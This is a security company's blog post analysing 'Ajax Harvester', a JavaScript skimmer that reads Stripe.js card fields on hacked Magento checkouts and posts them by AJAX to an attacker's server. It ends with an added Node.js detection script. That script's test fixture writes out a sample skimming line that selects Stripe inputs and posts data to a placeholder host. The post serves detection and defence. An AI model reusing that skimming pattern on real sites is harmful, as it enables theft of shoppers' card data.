Foregenix Blog

New JavaScript Malware Targeting Stripe.js on Magento Websites - Ajax Harvester

Posted by Mike Hinton on 04/04/17 07:53

The Foregenix DFIR team has discovered what is believed to be an unreported piece of malware which has recently been used to target insecure eCommerce websites processing through Stripe, running on the Magento framework.

The Malware

Dubbed ‘Ajax Harvester’ by analysts, the malware is a piece of JavaScript which, when inserted into a compromised site, waits until a Magento payment page is visited. It specifically looks for payment pages using the One Page, CheckoutSuite, One Step Checkout and Fire Checkout page titles, as shown below.

[Image: Ajax Harvester - Stripe 1.png]

If a payment page is identified, it loads a further JavaScript file (in this instance named ‘extra.js’) which searches for input fields specifically related to the now deprecated, although still widely used, ‘stripe.js’ Magento payment integration. Some of the malicious code is shown below.

[Image: Ajax Harvester - Stripe 2.png]

Although the malware is not unique in its functionality, it does mean users could have their credit card data stolen even before they have pressed the checkout button. Rather than writing the captured data to a local harvest file for later retrieval by the attacker, it posts the data to an external server controlled by the attacker, using a jQuery AJAX function, as soon as values have been entered into an input field.

What does make the malware distinct is the fact that it is directly targeting the Stripe.js code for Magento. 

Prevention

This attack is only possible when a website is insecure. To be clear, while this attack focuses on the Stripe.js integration for Magento, it can only take place when the website itself has been hacked. Preventing this attack therefore requires a website administrator or web developer to keep the website secure. Here's an article we recently wrote on Securing Your Magento Website.

Detection

In order to detect this malware on your website, you'll need an internal scan of your environment that looks for key indicators of compromise.

You can detect these by using a free Guided Threat Review from the Foregenix team. 
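As an added example (not Foregenix's tooling and not code from the original post), the following Node.js function triages a script's source against the three behaviours described above: a checkout page-title check, a lookup of Stripe-related input fields, and a jQuery AJAX call to an outside host. The regexes, the allowlisted hosts and the sample fragments are assumptions constructed for illustration.

```javascript
// Added example: heuristic triage for the behaviours described in this post.
// Titles come from the post; regexes, hosts and samples are assumptions.
const CHECKOUT_TITLES = ["One Page", "CheckoutSuite", "One Step Checkout", "Fire Checkout"];

// Hosts that jQuery AJAX calls hard-code as absolute URLs, minus allowed ones.
function externalAjaxHosts(src, allowedHosts) {
  const hosts = new Set();
  for (const call of src.matchAll(/(?:\$|jQuery)\.(?:ajax|post)\s*\(/g)) {
    const nearby = src.slice(call.index, call.index + 400);
    for (const url of nearby.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
      const host = url[1].toLowerCase();
      if (!allowedHosts.includes(host)) hosts.add(host);
    }
  }
  return [...hosts];
}

function scanScript(name, src, allowedHosts) {
  const hosts = externalAjaxHosts(src, allowedHosts);
  const hits = [];
  // 1. Script branches on the page title of a known checkout module.
  if (/document\.title/.test(src) && CHECKOUT_TITLES.some((t) => src.includes(t))) hits.push("checkout-title-check");
  // 2. Script selects input fields whose id/name mentions stripe.
  if (/input[^\n;]{0,60}stripe|stripe[^\n;]{0,60}input/i.test(src)) hits.push("stripe-field-access");
  // 3. Script sends an AJAX request to a host outside the allowlist.
  if (hosts.length > 0) hits.push("ajax-to-external-host");
  // An outside AJAX destination plus one targeting signal matches the post.
  const flagged = hits.includes("ajax-to-external-host") && hits.length >= 2;
  return { name, hits, hosts, flagged };
}

// Constructed, non-functional fragments used only to exercise the heuristics.
const SAMPLE_SUSPECT = [
  'if (document.title.indexOf("One Step Checkout") > -1) { load("extra.js"); }',
  'var f = $("input[id*=stripe]");',
  '$.ajax({ type: "POST", url: "https://collector.invalid/c", data: d });',
].join("\n");
const SAMPLE_BENIGN = [
  'if (document.title.indexOf("One Step Checkout") > -1) { initCheckout(); }',
  '$.ajax({ type: "POST", url: "/checkout/onepage/saveOrder", data: form });',
  '$.ajax({ url: "https://api.stripe.com/v1/tokens", type: "POST", data: t });',
].join("\n");

// Assumed allowlist: the shop's own host plus Stripe's API and script hosts.
const ALLOWED = ["shop.example.com", "api.stripe.com", "js.stripe.com"];
for (const [name, src] of [["suspect.js", SAMPLE_SUSPECT], ["checkout.js", SAMPLE_BENIGN]]) {
  console.log(JSON.stringify(scanScript(name, src, ALLOWED)));
}
```

A flagged file is a prompt for manual review rather than a verdict, and obfuscated or minified code will not match plain-text patterns like these.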


Topics: web security, Magento, malware, JavaScript